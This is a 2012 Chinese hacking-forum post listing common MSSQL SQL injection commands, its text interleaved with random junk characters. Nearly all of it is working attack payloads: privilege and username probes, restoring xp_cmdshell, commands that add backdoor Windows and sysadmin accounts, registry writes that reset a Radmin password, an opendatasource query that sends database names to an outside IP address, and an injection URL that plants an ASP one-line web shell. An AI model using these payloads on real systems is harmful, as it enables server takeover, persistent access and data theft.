找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2056|回复: 0
打印 上一主题 下一主题

常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:40:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
//看看是什么权限的0 [; ?# _6 d: L
and 1=(Select IS_MEMBER('db_owner'))
' D" f, A: d9 P. ?3 |2 e/ uAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
+ |8 }$ t6 ^& `1 D- l% y2 a6 m
7 N4 z" M0 ?' h5 i//检测是否有读取某数据库的权限" ~* X" A3 Y( O7 g6 Y
and 1= (Select HAS_DBACCESS('master'))
' O& q# r8 O$ h+ `& c! FAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
6 G6 `+ t6 p% C" B1 b" {- ]
( `7 x+ O) J5 k( ^3 Y, u  T1 B/ b9 w7 _: q0 h- Z
数字类型3 D+ c) p7 w' m1 ]# b  s3 V
and char(124)%2Buser%2Bchar(124)=0
* Q# `9 s: D6 I
) [- W$ \# ^) ?4 u* s+ y9 G8 @字符类型
* v2 `& m1 m; O; g! U' and char(124)%2Buser%2Bchar(124)=0 and ''='1 _  a& I3 j' ^( Q: E

1 l$ W0 x6 F* d3 S8 s( Y搜索类型- @8 w% [* S# f. p
' and char(124)%2Buser%2Bchar(124)=0 and '%'='9 ]' p2 w4 k+ r: l
/ c7 G/ P+ ?7 O% P0 h% S7 I
爆用户名
' F/ V" C+ a8 V" G6 w2 rand user>0
3 Y6 x1 T6 H$ _5 X6 O' and user>0 and ''='7 f/ I) s; g. g$ y3 G/ C5 c8 r
/ d! n1 m, g2 M) A' }2 j  r
检测是否为SA权限& I, w' ^8 N& T0 W( P, a" T
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--, M8 b) K( k' U( F6 O; ?
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --' \; }9 O3 f" [, r
0 }& J; V: W3 f& k& s8 G% Q
检测是不是MSSQL数据库3 m5 I  W8 m& D& E  y% x
and exists (select * from sysobjects);--
# D+ O6 Q, X& a. h
# w4 f& E1 I# h1 d$ O检测是否支持多行' |. R) t0 W! @' f, O( d' T
;declare @d int;--
4 u  u) D' }$ m: o. q3 w. L5 x0 L5 d' Z2 M0 Q
恢复 xp_cmdshell- Y# \( o: E7 g: f2 |. w$ w5 ?$ y( ]% f
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--* l9 E' }$ j- }6 U' T% e0 J

. }/ a8 `) F2 t1 |5 f0 G7 @- j6 C8 N  e8 @" S3 ]
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# o2 s+ i* d7 l' c$ S, x0 g& x
//-----------------------
3 l' G/ y% A6 i5 v$ v4 D" \//       执行命令4 C; H3 _4 G5 }8 }1 T
//-----------------------. ~7 a* \+ u$ w6 k6 K' A" I3 n
首先开启沙盘模式:
, ?  ~- I3 o+ m5 a, Wexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) I0 i/ R2 R4 S- e& X5 g
2 ?9 R3 l" a$ Q5 h4 |' ~然后利用jet.oledb执行系统命令) D0 F! a& m5 b# Q! c* s
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')% I3 Q" D, J. A; |" D

6 J; X: x' C2 u3 h执行命令( p5 S' L, _' g
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--' _; S5 K0 m' S

1 d4 x& E2 R3 Y0 A# c% @EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'* `6 d- L0 K9 _

8 b# q  _- x2 l8 f; O( r判断xp_cmdshell扩展存储过程是否存在:
: P  b4 N; E" j% V2 H  W& l. A) Chttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'). D6 P9 k+ ^+ q% n

( k" c1 q; O6 B% d" A; ^2 O* m# M" I写注册表4 k! z& s: ~/ o/ V4 N( F( X
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& `0 S2 @. H7 l! x9 C0 P0 ?
: l  @7 |9 Z* Z2 u
REG_SZ
& |* U! M$ d2 |' R) H, r6 l0 ~4 Q* z2 e9 [) ~
读注册表0 j$ K" G8 d3 M* u, H: g4 B# y
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'1 V- o) i: u5 r) F0 Y$ E
+ Y* }, m6 S8 @
读取目录内容# ~9 O( V) X1 p& X1 s
exec master..xp_dirtree 'c:\winnt\system32\',1,1; m( E: r+ l" }$ m. E" ]

! a# N6 L6 G9 [  ~' w( ^( h0 Z. {/ A
数据库备份
% `- N# K4 ~2 B- C3 ^  `5 ?backup database pubs to disk = 'c:\123.bak'
: k$ Q7 B9 Y1 h0 |5 b! Y% S$ K- M7 ?, n- ?! t
//爆出长度, b- k: b, O( T8 L( ^; I
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--9 {- }. l8 s8 Z' U$ L% ]: N

. @3 z- z" N5 P) A" k$ ~  B3 m6 m7 ^! T2 e* y' H

0 h  r1 W9 Q0 N更改sa口令方法:用sql综合利用工具连接后,执行命令:
' Y0 v( R1 z4 ?! v! e4 e6 E% Zexec sp_password NULL,'新密码','sa'
3 W% C/ \/ {/ o2 q  y( \- M% x, a3 ]
添加和删除一个SA权限的用户test:
, f& k% \! G2 w' k0 `: H5 h3 {) ~exec master.dbo.sp_addlogin test,9530772, A7 g8 p6 g, s
exec master.dbo.sp_addsrvrolemember test,sysadmin& {6 @/ {1 M/ v9 C

1 o3 M' q+ j& d6 X; `删除扩展存储过过程xp_cmdshell的语句:2 G( Y8 @# N& D8 R4 ^+ Z
exec sp_dropextendedproc 'xp_cmdshell'
8 X. a* q. D' d- g* U
& V* b5 b. o4 f7 p) ~2 G添加扩展存储过过程
  g2 ^+ E: J6 m/ ]9 C- u0 ?EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
. H; I9 ~) [2 C$ @+ L9 ?/ n% OGRANT exec On xp_proxiedadata TO public& j! ^( R# t8 k$ m

6 X4 K% j/ O0 L0 ~; Z5 K; B1 C8 n/ Q" j
停掉或激活某个服务。/ B5 X: Y  a. W: `7 g' n9 Y

. ~( b/ m+ `' C- B, G: t. Texec master..xp_servicecontrol 'stop','schedule': `' M0 B( ~; t
exec master..xp_servicecontrol 'start','schedule'
: j# j& h; I+ Y6 O7 a% n+ J( _
& A5 i6 }3 B. z8 z' odbo.xp_subdirs
. X# p0 _' P6 j/ l8 W0 p# z- P0 p4 Y; B: [+ X# W
只列某个目录下的子目录。+ n8 H" u6 Y8 Z. q
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
7 Y3 R. v0 q- [7 i) H+ n
' b9 }' P& B% x7 v# Xdbo.xp_makecab
* m; o/ p+ @3 W/ p
. Y4 K/ }8 E4 g$ }6 ?+ C将目标多个档案压缩到某个目标档案之内。% ~, p1 i6 T$ z6 A+ o2 S& R
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。6 S) @; S1 _4 N* ~

' t& Q0 C/ X2 Y8 Edbo.xp_makecab3 ^: N, [' I- g$ Y; N4 E
'c:\test.cab','mszip',1,
' o" O+ z7 \  r7 z( u'C:\Inetpub\wwwroot\SQLInject\login.asp',
3 X! @0 W) S' `! ]' H) D# c'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
2 B3 v0 R" e4 s  I) Y$ r% S2 T  a+ n( f+ O
xp_terminate_process
9 \" C" T9 f# |3 q/ y* A% Y, u& K. v  _7 t$ h
停掉某个执行中的程序,但赋予的参数是 Process ID。3 q- h, J; q3 [6 S0 S; T4 z5 ~9 x
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID7 z$ Q) l5 {) a: b$ y" p8 i7 P
$ I) Z+ D9 ?" [" N* M7 ^) A, p  l
xp_terminate_process 24846 G" K' W- m2 j% F
& k2 m! Q, T  M. g: }
xp_unpackcab
- U" s) n8 K. H) h# j: Z
5 p# p1 ?5 r5 q5 C解开压缩档。
- T, q: e* {$ M- p" V
  p$ u$ Q2 K# e3 k7 txp_unpackcab 'c:\test.cab','c:\temp',1
* C& \9 K' d8 O! l7 V* e) b; c" d1 k: [7 P4 G5 |& [0 K, Z
* v9 E7 M$ a7 E% z9 z5 P
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234- w3 x$ b# E, d2 ?

) y/ \# p, S* x+ _$ Fcreate database lcx;6 a3 H# _* ^* ~/ m1 O, z) O/ s
Create TABLE ku(name nvarchar(256) null);3 |  t7 |* v3 A) [4 U% d+ ]
Create TABLE biao(id int NULL,name nvarchar(256) null);
  Q1 ~. G3 A  O: f# F
% {: C: I/ q% [- t- N* ]( _//得到数据库名- e7 ?: {2 ]2 s  Y: {3 ~0 y# f
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
2 T6 A1 {3 F5 U, C! _+ ?& F* \6 k" a3 \  ^
2 ?4 Y6 D& R* H1 X2 J5 [8 W4 A
//在Master中创建表,看看权限怎样: e5 H, h. `. O1 V, ]
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--4 x# a4 E! _$ u+ M
0 A- U' [' }; V' V
用 sp_makewebtask直接在web目录里写入一句话马:
9 s3 i* N% }7 F- P+ ~http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
4 F6 C  P' Q" K0 d: c
9 A( g7 G1 {. b. K7 j//更新表内容
6 v7 v6 [) Z8 {! j* h9 \$ b6 e/ OUpdate films SET kind = 'Dramatic' Where id = 1237 r1 T' z/ B" T5 }
6 g* J* N, x9 ]( J" ~
//删除内容+ E& E" j. _1 T; Q. d' U
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表